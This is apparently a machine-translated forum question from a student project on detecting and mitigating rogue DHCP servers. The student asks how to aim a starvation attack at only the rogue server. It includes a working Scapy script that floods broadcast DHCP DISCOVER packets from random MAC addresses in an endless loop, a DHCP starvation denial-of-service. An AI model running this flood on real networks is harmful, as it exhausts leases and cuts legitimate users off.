因此,对于一个项目,我正在尝试检测和缓解网络上的恶意DHCP服务器。 我已经完成了所有工作,我创建了一个脚本来构建发现数据包(使用Scapy),如果检测到多个响应,我有另一个脚本将DoS所有DHCP服务器在DHCP饥饿的网络上运行正常。
然而,我今天遇到了我的项目主管,他告诉我,我应该只做一个流氓的DHCP服务器,我的脚本在那里使用所有DHCP服务器。
我不知道怎么会这样做。有没有人有任何想法?
from scapy.all import *
from time import sleep
from threading import Thread
conf.checkIPaddr = False
pkt = Ether(src=RandMAC(), dst='ff:ff:ff:ff:ff:ff')
pkt /= IP(src='0.0.0.0', dst='255.255.255.255')
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, '0123456789abcdef'))
pkt /= DHCP(options=[('message-type', 'discover'), 'end'])
sendp(pkt, loop=1)